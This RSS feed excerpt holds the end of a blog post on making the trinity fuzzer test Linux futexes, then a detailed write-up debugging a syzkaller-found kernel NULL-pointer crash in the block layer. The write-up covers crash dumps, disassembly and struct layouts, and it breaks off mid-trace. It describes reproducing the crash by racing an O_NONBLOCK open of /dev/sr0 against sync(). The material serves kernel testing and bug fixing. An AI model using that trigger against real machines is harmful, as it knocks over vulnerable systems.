There are two immediately obvious op flags that are not being exercised at all (with the exception of randomly bumping into them, which is quite unlikey and badly controllable):</div>
<ul>
<li><span>FUTEX_CLOCK_RT:</span> When set, the kernel treats the timeout as an absolute time based on <span>CLOCK_REALTIME</span> as opposed to <span>CLOCK_MONOTONIC.</span> This is only affected by <span>FUTEX_WAIT_BITSET</span> and <span>FUTEX_REQUEUE_PI</span> commands.</li>
</ul>
<ul>
<li><span>FUTEX_PRIVATE_FLAG:</span> Refers to the user address space mapping, and applies to all operations. The main benefit is that kernel can directly use the virtual address without having to do any lookups or other overhead (vmas, gup, thp, etc.) imposed by shared mappings.</li>
</ul>
<h4>
Ever-changing task priorities</h4>
<div>
The whole purpose of PI futexes are to address priority inheritance issues for systems with real time requirements. Randomly changing a processes priority will therefore better stress the system call instead of always using the default nice value, exercising priority boosting code in the kernel.</div>
<div>
<h4>
Fault/error injections</h4>
<div>
This year we <a href="https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ab51fbab39d864f3223e44a2600fd951df261f0b">added</a> support for artificially triggering errors within the various futex paths faults and deadlock scenarios, via the <span>CONFIG_FAULT_INJECTION</span> kernel framework along with the <span>CONFIG_FAIL_FUTEX</span> option. Trinity can make use of this feature by randomly toggling the process' <a href="https://www.kernel.org/doc/Documentation/fault-injection/fault-injection.txt">make-it-fail</a> file as well as selecting appropriate fault injection debugfs options.</div>
</div>
<h4>
Feeding user-addresses</h4>
<div>
Perhaps the single most important argument that we can pass to the syscall is the user address (uaddr, or 'the futex'), which will govern everything the kernel attempts to do with it, being private or shared address space. As such, it is not very useful to blindly feed it random addresses, even if trinity is setup by default, these inputs will sometimes be picked by previously <i>mmap-created</i> shared memory playgrounds. However, at a futex level, this does not matter unless we are doing blocking calls (WAIT).<br>
<br>
So this has been reworked such that trinity now creates a number of locks in shared memory at startup, which has the owner PID and the actual futex. Upon a call, both fields of uaddr get either a random lock or a random address from the mmap playground, each with a 50% chance. The locks follow very simple semantics, where a successful <i>cmpxchg</i> will allow the caller to acquire the lock without the kernel being involved (fastpath), otherwise we need to wait/block through the futex call.<br>
<br>
Because of how trinity is structured with callbacks for pre/post syscall invocation, there are a number of racy windows between when the lock is dealt (ie considered contended) with and when the fuzzer actually calls futex(2). As such, this must be taken with a grain of salt, but does exercise lots of real world situations, nonetheless.<br>
<h4>
Choosing operations</h4>
The idea is to randomly perform different operations on the selected futex, such that combinations of wake, wait, requeue are done (both for regular and PI futexes). While passing informed, <i>not-so-random,</i> parameters to the system call reduces the chance of shallow fuzzing, choosing the futex operation will determine the kind of work to be done on the uaddress. As such this part can further determine the usefulness of trinity regarding futexes. However, one cannot get too strict here as reducing the randomness will also limit the usefulness. For now the layout is a 25% chance when performing lock operations. Oh the other hand, for the case of mmap selected uaddress, the operation is left up to trinity to decide.</div>
<div>
</div>
<div>
</div>
<div>
<h3>
Evaluation and future work</h3>
<div>
Evaluating software that purposely tries to mess up other software is always twofold. For one, any new futex bug that is found indicates that modifying trinity was a good step towards better testing coverage. But unfortunately this creates a new headache for futex hackers, and a bug needs to be fixed (including any corresponding Linux distribution backporting, security and <i>-stable</i> work). So any useful results which exhibit the presence of bugs can be bitter/sweet -- just think <a href="http://www.brainyquote.com/quotes/quotes/e/edsgerdijk201165.html">Dijkstra</a>.<br>
<br>
One immediate way of evaluating the changes to trinity is to see the number of successful calls. While this can be a misleading metric, it does at least indicate whether or not many of the bogus parameter passing have been mitigated and replaced with smarter, more informed calls. Tests show that these changes have in fact boosted the amount of successful futex(2) returns; within a trinity run of 10,000 calls with 4 threads, we were able to go from ~470 to nearly ~4300, which is around a 10x improvement. This also means that it takes more time to run trinity as the kernel is doing actual work now with our futexes, not simply returning immediately due to bogus parameters and trivial error checks.<br>
<br>
In the future, it would be good to fuzz futexes with memory-back file (uaddress), instead of always relying on anonymous memory. While is perhaps not so interesting from a futex standpoint (with the exception of hashing), it would be good when combining with other memory related calls which actually do things with the file. Another useful direction would be to further investigate operation selection policies. Different models will fuzz different parts of the futex subsystem, and perhaps (very probably, actually) I have not found the best one yet.</div>
<div>
<br></div>
</div>
<div>
This work was done as part of SUSE <a href="https://hackweek.suse.com/13/projects/1064">Hackweek 13</a>, which allowed me to finally allocate some time to focus on this (although this writing is much overdue). So as always, lots of thanks to my employer.</div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Debugging a kernel crash found by syzkaller]]></title>
<description><![CDATA[Having done quite a bit of kernel fuzzing and debugging lately I’ve decided to take one of the very latest crashes and write up the whole process from start to finish as I work through it. As you will see, I'm not very familiar with the site of this particular crash, the block layer. Being famili...]]></description>
<link>https://tsecurity.de/de/3500794/unix-server/debugging-a-kernel-crash-found-by-syzkaller/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500794/unix-server/debugging-a-kernel-crash-found-by-syzkaller/</guid>
<pubDate>Fri, 08 May 2026 22:55:11 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Having done quite a bit of kernel fuzzing and debugging lately I’ve decided to take one of the very latest crashes and write up the whole process from start to finish as I work through it. As you will see, I'm not very familiar with the site of this particular crash, the block layer. Being familiar with some existing kernel code helps, of course, since you recognise a lot of code patterns, but the kernel is so large that nobody can be familiar with everything and the crashes found by trinity and syzkaller can show up almost anywhere.<br>
<br>
So I got this with syzkaller after running it for a few hours:<br>
<pre><code>general protection fault: 0000 [#1] PREEMPT SMP KASAN
Dumping ftrace buffer:
   (ftrace buffer empty)
CPU: 0 PID: 11941 Comm: syz-executor Not tainted 4.8.0-rc2+ #169
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2014
task: ffff880110762cc0 task.stack: ffff880102290000
RIP: 0010:[&lt;ffffffff81f04b7a&gt;]  [&lt;ffffffff81f04b7a&gt;] blk_get_backing_dev_info+0x4a/0x70
RSP: 0018:ffff880102297cd0  EFLAGS: 00010202
RAX: dffffc0000000000 RBX: 0000000000000000 RCX: ffffc90000bb4000
RDX: 0000000000000097 RSI: 0000000000000000 RDI: 00000000000004b8
RBP: ffff880102297cd8 R08: 0000000000000000 R09: 0000000000000001
R10: 0000000000000000 R11: 0000000000000001 R12: ffff88011a010a90
R13: ffff88011a594568 R14: ffff88011a010890 R15: 7fffffffffffffff
FS:  00007f2445174700(0000) GS:ffff88011aa00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00000000200047c8 CR3: 0000000107eb5000 CR4: 00000000000006f0
DR0: 000000000000001e DR1: 000000000000001e DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000600
Stack:
 1ffff10020452f9e ffff880102297db8 ffffffff81508daa 0000000000000000
 0000000041b58ab3 ffffffff844e89e1 ffffffff81508b30 ffffed0020452001
 7fffffffffffffff 0000000000000000 0000000000000000 7fffffffffffffff
Call Trace:
 [&lt;ffffffff81508daa&gt;] __filemap_fdatawrite_range+0x27a/0x2e0
 [&lt;ffffffff81508b30&gt;] ? filemap_check_errors+0xe0/0xe0
 [&lt;ffffffff83c24b47&gt;] ? preempt_schedule+0x27/0x30
 [&lt;ffffffff810020ae&gt;] ? ___preempt_schedule+0x16/0x18
 [&lt;ffffffff81508e36&gt;] filemap_fdatawrite+0x26/0x30
 [&lt;ffffffff817191b0&gt;] fdatawrite_one_bdev+0x50/0x70
 [&lt;ffffffff817341b4&gt;] iterate_bdevs+0x194/0x210
 [&lt;ffffffff81719160&gt;] ? fdatawait_one_bdev+0x70/0x70
 [&lt;ffffffff817195f0&gt;] ? sync_filesystem+0x240/0x240
 [&lt;ffffffff817196be&gt;] sys_sync+0xce/0x160
 [&lt;ffffffff817195f0&gt;] ? sync_filesystem+0x240/0x240
 [&lt;ffffffff81002b60&gt;] ? exit_to_usermode_loop+0x190/0x190
 [&lt;ffffffff8150455a&gt;] ? __context_tracking_exit.part.4+0x3a/0x1e0
 [&lt;ffffffff81005524&gt;] do_syscall_64+0x1c4/0x4e0
 [&lt;ffffffff83c3276a&gt;] entry_SYSCALL64_slow_path+0x25/0x25
Code: 89 fa 48 c1 ea 03 80 3c 02 00 75 35 48 8b 9b e0 00 00 00 48 b8 00 00 00 00 00 fc ff df 48 8d bb b8 04 00 00 48 89 fa 48 c1 ea 03 &lt;80&gt; 3c 02 00 75 17 48 8b 83 b8 04 00 00 5b 5d 48 05 10 02 00 00 
RIP  [&lt;ffffffff81f04b7a&gt;] blk_get_backing_dev_info+0x4a/0x70
 RSP &lt;ffff880102297cd0&gt;</code></pre>The very first thing to do is to look up the code in the backtrace:<br>
<pre><code>$ addr2line -e vmlinux -i ffffffff81f04b7a ffffffff81508daa ffffffff81508e36 ffffffff817191b0 ffffffff817341b4 ffffffff817196be
./include/linux/blkdev.h:844
block/blk-core.c:116
./include/linux/backing-dev.h:186
./include/linux/backing-dev.h:229
mm/filemap.c:316
mm/filemap.c:334
fs/sync.c:85
./include/linux/spinlock.h:302
fs/block_dev.c:1910
fs/sync.c:116</code></pre>The actual site of the crash is this:<br>
<pre><code> 842 static inline struct request_queue *bdev_get_queue(struct block_device *bdev)
 843 {
 844         return bdev-&gt;bd_disk-&gt;queue;    /* this is never NULL */
 845 }</code></pre>Because we’re using KASAN we can’t look at CR2 to find the bad pointer because KASAN triggers before the page fault (or to be completely honest, KASAN tries to access the shadow memory for the bad pointer, which is itself a bad pointer and causes the GPF above).<br>
<br>
Let’s look at the “Code:” line to try to find the exact dereference causing the error:<br>
<pre><code>$ echo 'Code: 89 fa 48 c1 ea 03 80 3c 02 00 75 35 48 8b 9b e0 00 00 00 48 b8 00 00 00 00 00 fc ff df 48 8d bb b8 04 00 00 48 89 fa 48 c1 ea 03 &lt;80&gt; 3c 02 00 75 17 48 8b 83 b8 04 00 00 5b 5d 48 05 10 02 00 00 ' | scripts/decodecode 
Code: 89 fa 48 c1 ea 03 80 3c 02 00 75 35 48 8b 9b e0 00 00 00 48 b8 00 00 00 00 00 fc ff df 48 8d bb b8 04 00 00 48 89 fa 48 c1 ea 03 &lt;80&gt; 3c 02 00 75 17 48 8b 83 b8 04 00 00 5b 5d 48 05 10 02 00 00
All code
========
   0:   89 fa                   mov    %edi,%edx
   2:   48 c1 ea 03             shr    $0x3,%rdx
   6:   80 3c 02 00             cmpb   $0x0,(%rdx,%rax,1)
   a:   75 35                   jne    0x41
   c:   48 8b 9b e0 00 00 00    mov    0xe0(%rbx),%rbx
  13:   48 b8 00 00 00 00 00    movabs $0xdffffc0000000000,%rax
  1a:   fc ff df 
  1d:   48 8d bb b8 04 00 00    lea    0x4b8(%rbx),%rdi
  24:   48 89 fa                mov    %rdi,%rdx
  27:   48 c1 ea 03             shr    $0x3,%rdx
  2b:*  80 3c 02 00             cmpb   $0x0,(%rdx,%rax,1)               &lt;-- trapping instruction
  2f:   75 17                   jne    0x48
  31:   48 8b 83 b8 04 00 00    mov    0x4b8(%rbx),%rax
  38:   5b                      pop    %rbx
  39:   5d                      pop    %rbp
  3a:   48 05 10 02 00 00       add    $0x210,%rax</code></pre>I’m using <code>CONFIG_KASAN_INLINE=y</code> so most of the code above is actually generated by KASAN which makes things a bit harder to read. The movabs with a weird 0xdffff… address is how it generates the address for the shadow memory bytemap and the cmpb that crashed is where it tries to read the value of the shadow byte.<br>
<br>
The address is %rdx + %rax and we know that %rax is 0xdffffc0000000000. Let’s look at %rdx in the crash above… <code>RDX: 0000000000000097</code>; yup, that’s a NULL pointer dereference all right.<br>
<br>
But the line in question has two pointer dereferences, <code>bdev-&gt;bd_disk</code> and <code>bd_disk-&gt;queue</code>, and which one is the crash? The <code>lea 0x4b8(%rbx), %rdi</code> is what gives it away, since that gives us the offset into the structure that is being dereferenced (also, NOT coincidentally, %rbx is 0). Let’s use pahole:<br>
<pre><code>$ pahole -C 'block_device' vmlinux
struct block_device {
        dev_t                      bd_dev;               /*     0     4 */
        int                        bd_openers;           /*     4     4 */
        struct inode *             bd_inode;             /*     8     8 */
        struct super_block *       bd_super;             /*    16     8 */
        struct mutex               bd_mutex;             /*    24   128 */
        /* --- cacheline 2 boundary (128 bytes) was 24 bytes ago --- */
        void *                     bd_claiming;          /*   152     8 */
        void *                     bd_holder;            /*   160     8 */
        int                        bd_holders;           /*   168     4 */
        bool                       bd_write_holder;      /*   172     1 */

        /* XXX 3 bytes hole, try to pack */

        struct list_head           bd_holder_disks;      /*   176    16 */
        /* --- cacheline 3 boundary (192 bytes) --- */
        struct block_device *      bd_contains;          /*   192     8 */
        unsigned int               bd_block_size;        /*   200     4 */

        /* XXX 4 bytes hole, try to pack */

        struct hd_struct *         bd_part;              /*   208     8 */
        unsigned int               bd_part_count;        /*   216     4 */
        int                        bd_invalidated;       /*   220     4 */
        struct gendisk *           bd_disk;              /*   224     8 */
        struct request_queue *     bd_queue;             /*   232     8 */
        struct list_head           bd_list;              /*   240    16 */
        /* --- cacheline 4 boundary (256 bytes) --- */
        long unsigned int          bd_private;           /*   256     8 */
        int                        bd_fsfreeze_count;    /*   264     4 */

        /* XXX 4 bytes hole, try to pack */

        struct mutex               bd_fsfreeze_mutex;    /*   272   128 */
        /* --- cacheline 6 boundary (384 bytes) was 16 bytes ago --- */

        /* size: 400, cachelines: 7, members: 21 */
        /* sum members: 389, holes: 3, sum holes: 11 */
        /* last cacheline: 16 bytes */
};</code></pre>0x4b8 is 1208 in decimal, which is way bigger than this struct. Let’s try the other one:<br>
<pre><code>$ pahole -C 'gendisk' vmlinux
struct gendisk {
        int                        major;                /*     0     4 */
        int                        first_minor;          /*     4     4 */
        int                        minors;               /*     8     4 */
        char                       disk_name[32];        /*    12    32 */

        /* XXX 4 bytes hole, try to pack */

        char *                     (*devnode)(struct gendisk *, umode_t *); /*    48     8 */
        unsigned int               events;               /*    56     4 */
        unsigned int               async_events;         /*    60     4 */
        /* --- cacheline 1 boundary (64 bytes) --- */
        struct disk_part_tbl *     part_tbl;             /*    64     8 */
        struct hd_struct           part0;                /*    72  1128 */
        /* --- cacheline 18 boundary (1152 bytes) was 48 bytes ago --- */
        const struct block_device_operations  * fops;    /*  1200     8 */
        struct request_queue *     queue;                /*  1208     8 */
        /* --- cacheline 19 boundary (1216 bytes) --- */
        void *                     private_data;         /*  1216     8 */
        int                        flags;                /*  1224     4 */

        /* XXX 4 bytes hole, try to pack */

        struct kobject *           slave_dir;            /*  1232     8 */
        struct timer_rand_state *  random;               /*  1240     8 */
        atomic_t                   sync_io;              /*  1248     4 */

        /* XXX 4 bytes hole, try to pack */

        struct disk_events *       ev;                   /*  1256     8 */
        struct kobject             integrity_kobj;       /*  1264    64 */
        /* --- cacheline 20 boundary (1280 bytes) was 48 bytes ago --- */
        int                        node_id;              /*  1328     4 */

        /* XXX 4 bytes hole, try to pack */

        struct badblocks *         bb;                   /*  1336     8 */
        /* --- cacheline 21 boundary (1344 bytes) --- */

        /* size: 1344, cachelines: 21, members: 20 */
        /* sum members: 1328, holes: 4, sum holes: 16 */
};</code></pre>1208 is <code>-&gt;queue</code>, so that fits well with what we’re seeing; therefore, <code>bdev-&gt;bd_disk</code> must be NULL.<br>
<br>
At this point I would go up the stack of function to see if anything sticks out – although unlikely, it’s possible that it’s an “easy” bug where you can tell just from looking at the code in a single function that it sets the pointer to NULL just before calling the function that crashed or something like that.<br>
<br>
Probably the most interesting function in the stack trace (at a glance) is <code>iterate_bdevs()</code> in <code>fs/block_dev.c</code>:<br>
<pre><code>1880 void iterate_bdevs(void (*func)(struct block_device *, void *), void *arg)
1881 {
1882         struct inode *inode, *old_inode = NULL;
1883 
1884         spin_lock(&amp;blockdev_superblock-&gt;s_inode_list_lock);
1885         list_for_each_entry(inode, &amp;blockdev_superblock-&gt;s_inodes, i_sb_list) {
1886                 struct address_space *mapping = inode-&gt;i_mapping;
1887 
1888                 spin_lock(&amp;inode-&gt;i_lock);
1889                 if (inode-&gt;i_state &amp; (I_FREEING|I_WILL_FREE|I_NEW) ||
1890                     mapping-&gt;nrpages == 0) {
1891                         spin_unlock(&amp;inode-&gt;i_lock);
1892                         continue;
1893                 }
1894                 __iget(inode);
1895                 spin_unlock(&amp;inode-&gt;i_lock);
1896                 spin_unlock(&amp;blockdev_superblock-&gt;s_inode_list_lock);
1897                 /*
1898                  * We hold a reference to 'inode' so it couldn't have been
1899                  * removed from s_inodes list while we dropped the
1900                  * s_inode_list_lock  We cannot iput the inode now as we can
1901                  * be holding the last reference and we cannot iput it under
1902                  * s_inode_list_lock. So we keep the reference and iput it
1903                  * later.
1904                  */
1905                 iput(old_inode);
1906                 old_inode = inode;
1907 
1908                 func(I_BDEV(inode), arg);
1909 
1910                 spin_lock(&amp;blockdev_superblock-&gt;s_inode_list_lock);
1911         }
1912         spin_unlock(&amp;blockdev_superblock-&gt;s_inode_list_lock);
1913         iput(old_inode);
1914 }</code></pre>I can’t quite put my finger on it, but it looks interesting because it has a bunch of locking in it and it seems to be what’s getting the block device from a given inode. I ran <code>git blame</code> on the file/function in question since that might point to a recent change there, but the most interesting thing is commit 74278da9f7 changing some locking logic. Maybe relevant, maybe not, but let’s keep it in mind.<br>
<br>
Remember that <code>bd-&gt;bd_disk</code> is NULL. Let’s try to check if <code>-&gt;bd_disk</code> is assigned NULL anywhere:<br>
<pre><code>$ git grep -n '\-&gt;bd_disk.*=.*NULL'
block/blk-flush.c:470:  if (bdev-&gt;bd_disk == NULL)
drivers/block/xen-blkback/xenbus.c:466: if (vbd-&gt;bdev-&gt;bd_disk == NULL) {
fs/block_dev.c:1295:                                    bdev-&gt;bd_disk = NULL;
fs/block_dev.c:1375:    bdev-&gt;bd_disk = NULL;
fs/block_dev.c:1615:            bdev-&gt;bd_disk = NULL;
kernel/trace/blktrace.c:1624:   if (bdev-&gt;bd_disk == NULL)</code></pre>This by no means necessarily includes the code that set <code>-&gt;bd_disk</code> to NULL in our case (since there could be code that looks like <code>x = NULL; bdev-&gt;bd_disk = x;</code> which wouldn’t be found with the regex above), but this is a good start and I’ll look at the functions above just to see if it might be relevant. Actually, for this I’ll just add <code>-W</code> to the <code>git grep</code> above to quickly look at the functions.<br>
<br>
The first two and last hits are comparisons so they are uninteresting. The third and fourth ones are part of error paths in <code>__blkdev_get()</code>. That <i>might</i> be interesting if the process that crashed somehow managed to get a reference to the block device just after the NULL assignment (if so, that would probably be a locking bug in either <code>__blkdev_get()</code> or one of the functions in the crash stack trace – OR it might be a bug where the <code>struct block_device *</code> is made visible/reachable before it’s ready). The fifth one is in <code>__blkdev_put()</code>. I’m going to read over <code>__blkdev_get()</code> and <code>__blkdev_put()</code> to figure out what they do and if there’s maybe something going on in either of those.<br>
<br>
In all these cases, it seems to me that <code>&amp;bdev-&gt;bd_mutex</code> is locked; that’s a good sign. That’s also maybe an indication that we should be taking <code>&amp;bdev-&gt;bd_mutex</code> in the other code path, so let’s check if we are. There’s nothing that I can see in any of the functions from <code>inode_to_bdi()</code> and up. Although <code>inode_to_bdi()</code> itself looks interesting, because that’s where the block device pointer comes from; it calls <code>I_BDEV(inode)</code> which returns a <code>struct block_device *</code>. Although if we follow the stack even further up, we see that <code>fdatawrite_one_bdev()</code> in <code>fs/sync.c</code> also knows about a <code>struct block_device *</code>. This by the way appears to be what is called through the function pointer in <code>iterate_bdevs()</code>:<br>
<pre><code>1908                 func(I_BDEV(inode), arg);</code></pre>This in turn is called from the <code>sync()</code> system call. In other words, I cannot see any caller that takes <code>&amp;bdev-&gt;bd_mutex</code>. There may yet be another mechanism (maybe a lock) intended to prevent somebody from seeing <code>bdev-&gt;bd_disk == NULL</code>, but this seems like a strong indication of what the problem might be.<br>
<br>
Let’s try to figure out more about <code>-&gt;bd_mutex</code>, maybe there’s some documentation somewhere telling us what it’s supposed to protect. There is this:<br>
<pre><code>include/linux/fs.h=454=struct block_device {
include/linux/fs.h-455- dev_t                   bd_dev;  /* not a kdev_t - it's a search key */
include/linux/fs.h-456- int                     bd_openers;
include/linux/fs.h-457- struct inode *          bd_inode;       /* will die */
include/linux/fs.h-458- struct super_block *    bd_super;
include/linux/fs.h:459: struct mutex            bd_mutex;       /* open/close mutex */</code></pre>There is this:<br>
<pre><code>include/linux/genhd.h-680-/*
include/linux/genhd.h-681- * Any access of part-&gt;nr_sects which is not protected by partition
include/linux/genhd.h:682: * bd_mutex or gendisk bdev bd_mutex, should be done using this
include/linux/genhd.h-683- * accessor function.
include/linux/genhd.h-684- *
include/linux/genhd.h-685- * Code written along the lines of i_size_read() and i_size_write().
include/linux/genhd.h-686- * CONFIG_PREEMPT case optimizes the case of UP kernel with preemption
include/linux/genhd.h-687- * on.
include/linux/genhd.h-688- */
include/linux/genhd.h=689=static inline sector_t part_nr_sects_read(struct hd_struct *part)</code></pre>And there is this:<br>
<pre><code>include/linux/genhd.h-711-/*
include/linux/genhd.h:712: * Should be called with mutex lock held (typically bd_mutex) of partition
include/linux/genhd.h-713- * to provide mutual exlusion among writers otherwise seqcount might be
include/linux/genhd.h-714- * left in wrong state leaving the readers spinning infinitely.
include/linux/genhd.h-715- */
include/linux/genhd.h-716-static inline void part_nr_sects_write(struct hd_struct *part, sector_t size)</code></pre>Under <code>Documentation/</code> there is also this:<br>
<pre><code>--------------------------- block_device_operations -----------------------
[...]
locking rules:
                        bd_mutex
open:                   yes
release:                yes
ioctl:                  no
compat_ioctl:           no
direct_access:          no
media_changed:          no
unlock_native_capacity: no
revalidate_disk:        no
getgeo:                 no
swap_slot_free_notify:  no      (see below)</code></pre>Looking at <code>__blkdev_get()</code> again, there’s also one comment above it hinting at locking rules:<br>
<pre><code>1233 /*                  
1234  * bd_mutex locking:    
1235  *                      
1236  *  mutex_lock(part-&gt;bd_mutex)
1237  *    mutex_lock_nested(whole-&gt;bd_mutex, 1)
1238  */             
1239                 
1240 static int __blkdev_get(struct block_device *bdev, fmode_t mode, int for_part)</code></pre><code>__blkdev_get()</code> is called as part of <code>blkdev_get()</code>, which is what is called when you open a block device. In other words, it seems likely that we may have a race between opening/closing a block device and calling <code>sync()</code> – although for the <code>sync()</code> call to reach the block device, we should have some inode open on that block device (since we start out with an inode that is mapped to a block device with <code>I_BDEV(inode)</code>).<br>
<br>
Looking at the syzkaller log file, there is a <code>sync()</code> call just before the crash, and I also see references to <code>[sr0] unaligned transfer</code> (and sr0 is a block device, so that seems slightly suspicious):<br>
<pre><code>2016/08/25 05:45:02 executing program 0:
mmap(&amp;(0x7f0000001000)=nil, (0x4000), 0x3, 0x31, 0xffffffffffffffff, 0x0)
mbind(&amp;(0x7f0000004000)=nil, (0x1000), 0x8003, &amp;(0x7f0000002000)=0x401, 0x9, 0x2)
shmat(0x0, &amp;(0x7f0000001000)=nil, 0x4000)
dup2(0xffffffffffffffff, 0xffffffffffffff9c)
mmap(&amp;(0x7f0000000000)=nil, (0x1000), 0x3, 0x32, 0xffffffffffffffff, 0x0)
mmap(&amp;(0x7f0000000000)=nil, (0x1000), 0x3, 0x32, 0xffffffffffffffff, 0x0)
sync()
mmap(&amp;(0x7f0000000000)=nil, (0x1000), 0x3, 0x32, 0xffffffffffffffff, 0x0)
clock_gettime(0x0, &amp;(0x7f0000000000)={0x0, 0x0})
sr0] unaligned transfer
sr 1:0:0:0: [sr0] unaligned transfer
sr 1:0:0:0: [sr0] unaligned transfer
sr 1:0:0:0: [sr0] unaligned transfer
kasan: CONFIG_KASAN_INLINE enabled
2016/08/25 05:45:03 result failed=false hanged=false:

2016/08/25 05:45:03 executing program 1:
mmap(&amp;(0x7f0000002000)=nil, (0x1000), 0x3, 0x32, 0xffffffffffffffff, 0x0)
r0 = syz_open_dev$sr(&amp;(0x7f0000002000)="2f6465762f73723000", 0x0, 0x4800)
readahead(r0, 0xcb84, 0x10001)
mmap(&amp;(0x7f0000000000)=nil, (0x1000), 0x3, 0x32, 0xffffffffffffffff, 0x0)
mmap(&amp;(0x7f0000001000)=nil, (0x1000), 0x3, 0x32, 0xffffffffffffffff, 0x0)
syz_open_dev$mixer(&amp;(0x7f0000002000-0x8)="2f6465762f6d6978657200", 0x0, 0x86000)
mmap(&amp;(0x7f0000001000)=nil, (0x1000), 0x6, 0x12, r0, 0x0)
mount$fs(&amp;(0x7f0000001000-0x6)="6d73646f7300", &amp;(0x7f0000001000-0x6)="2e2f62757300", &amp;(0x7f0000001000-0x6)="72616d667300", 0x880, &amp;(0x7f0000000000)="1cc9417348")
kasan: GPF could be caused by NULL-ptr deref or user memory access</code></pre>Here we see both the <code>sync()</code> call and the <code>syz_open_dev$sr()</code> call and we see that the GFP seems to happen some time shortly after opening sr0:<br>
<pre><code>r0 = syz_open_dev$sr(&amp;(0x7f0000002000)="2f6465762f73723000", 0x0, 0x4800)

&gt;&gt;&gt; "2f6465762f73723000".decode('hex')
'/dev/sr0\x00'</code></pre>There’s also a <code>mount$fs()</code> call there that looks interesting. Its arguments are:<br>
<pre><code>&gt;&gt;&gt; "6d73646f7300".decode('hex')
'msdos\x00'
&gt;&gt;&gt; "2e2f62757300".decode('hex')
'./bus\x00'
&gt;&gt;&gt; "72616d667300".decode('hex')
'ramfs\x00'</code></pre>However, I can’t see any references to any block devices in <code>fs/ramfs</code>, so I think this is unlikely to be it. I do still wonder how opening <code>/dev/sr0</code> can do anything for us if it doesn’t have a filesystem or even a medium. [Note from the future: block devices are represented as inodes on the “bdev” pseudo-filesystem. Go figure!] Grepping for <code>sr0</code> in the rest of the syzkaller log shows this bit, which seems to indicate we do in fact have inodes for <code>sr0</code>:<br>
<pre><code>VFS: Dirty inode writeback failed for block device sr0 (err=-5).</code></pre>Grepping for “Dirty inode writeback failed”, I find <code>bdev_write_inode()</code> in <code>fs/block_dev.c</code>, called only from… <code>__blkdev_put()</code>. It definitely feels like we’re on to something now – maybe a race between <code>sync()</code> and <code>open()</code>/<code>close()</code> for <code>/dev/sr0</code>.<br>
<br>
syzkaller comes with some scripts to rerun the programs from a log file. I’m going to try that and see where it gets us – if we can reproduce the crash. I’ll first try to convert the two programs (the one with <code>sync()</code> and the one with the <code>open(/dev/sr0)</code>) to C and compile them. If that doesn’t work, syzkaller also has an option to auto-reproduce based on all the programs in the log file, but that’s likely slower and not always likely to succeed.<br>
<br>
I use <code>syz-prog2c</code> and launch the two programs in parallel in a VM, but it doesn’t show anything at all. I switch to <code>syz-repro</code> to see if it can reproduce anything given the log file, but this fails too. I see that there are other sr0-related messages in the kernel log, so there must be a way to open the device without just getting <code>ENOMEDIUM</code>. I do a stat on <code>/dev/sr0</code> to find the device numbers:<br>
<pre><code>$ stat /dev/sr0 
  File: ‘/dev/sr0’
  Size: 0               Blocks: 0          IO Block: 4096   block special file
Device: 5h/5d   Inode: 7867        Links: 1     Device type: b,0</code></pre>So the device major is 0xb (11 decimal). We can find this in <code>include/uapi/linux/major.h</code> and it gives us:<br>
<pre><code>include/uapi/linux/major.h:#define SCSI_CDROM_MAJOR     11</code></pre>We see that this is the driver responsible for <code>/dev/sr0</code>:<br>
<pre><code>drivers/scsi/sr.c:      rc = register_blkdev(SCSI_CDROM_MAJOR, "sr");</code></pre>(I could have guessed this as well, but there are so many systems and subsystems and drivers that I often double check just to make sure I’m in the right place.) I look for an <code>open()</code> function and I find two – <code>sr_open()</code> and <code>sr_block_open()</code>. <code>sr_block_open()</code> does <code>cdrom_open()</code> – from <code>drivers/cdrom/cdrom.c</code> – and this has an interesting line:<br>
<pre><code>        /* if this was a O_NONBLOCK open and we should honor the flags,
         * do a quick open without drive/disc integrity checks. */
        cdi-&gt;use_count++;
        if ((mode &amp; FMODE_NDELAY) &amp;&amp; (cdi-&gt;options &amp; CDO_USE_FFLAGS)) {
                ret = cdi-&gt;ops-&gt;open(cdi, 1);</code></pre>So we need to pass <code>O_NONBLOCK</code> to get the device to open. When I add this to the test program from the syzkaller log and run <code>sync()</code> in parallel… ta-da!<br>
<pre><code>kasan: CONFIG_KASAN_INLINE enabled
kasan: GPF could be caused by NULL-ptr deref or user memory access
general protection fault: 0000 [#1] PREEMPT SMP KASAN
Dumping ftrace buffer:
   (ftrace buffer empty)
CPU: 3 PID: 1333 Comm: sync1 Not tainted 4.8.0-rc2+ #169
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2014
task: ffff880114114080 task.stack: ffff880112bf0000
RIP: 0010:[&lt;ffffffff8170654d&gt;]  [&lt;ffffffff8170654d&gt;] wbc_attach_and_unlock_inode+0x23d/0x760
RSP: 0018:ffff880112bf7ca0  EFLAGS: 00010206
RAX: dffffc0000000000 RBX: ffff880112bf7d10 RCX: ffff8801141147d0
RDX: 0000000000000093 RSI: ffff8801170f8750 RDI: 0000000000000498
RBP: ffff880112bf7cd8 R08: 0000000000000000 R09: 0000000000000000
R10: ffff8801141147e8 R11: 0000000000000000 R12: ffff8801170f8750
R13: 0000000000000000 R14: ffff880112bf7d38 R15: ffff880112bf7d10
FS:  00007fd533aa2700(0000) GS:ffff88011ab80000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000601028 CR3: 0000000112b04000 CR4: 00000000000006e0
Stack:
 ffff8801170f8750 0000000000000000 1ffff1002257ef9e ffff8801170f8950
 ffff8801170f8750 0000000000000000 ffff880112bf7d10 ffff880112bf7db8
 ffffffff81508d70 0000000000000000 0000000041b58ab3 ffffffff844e89e1
Call Trace:
 [&lt;ffffffff81508d70&gt;] __filemap_fdatawrite_range+0x240/0x2e0
 [&lt;ffffffff81508b30&gt;] ? filemap_check_errors+0xe0/0xe0
 [&lt;ffffffff83c24b47&gt;] ? preempt_schedule+0x27/0x30
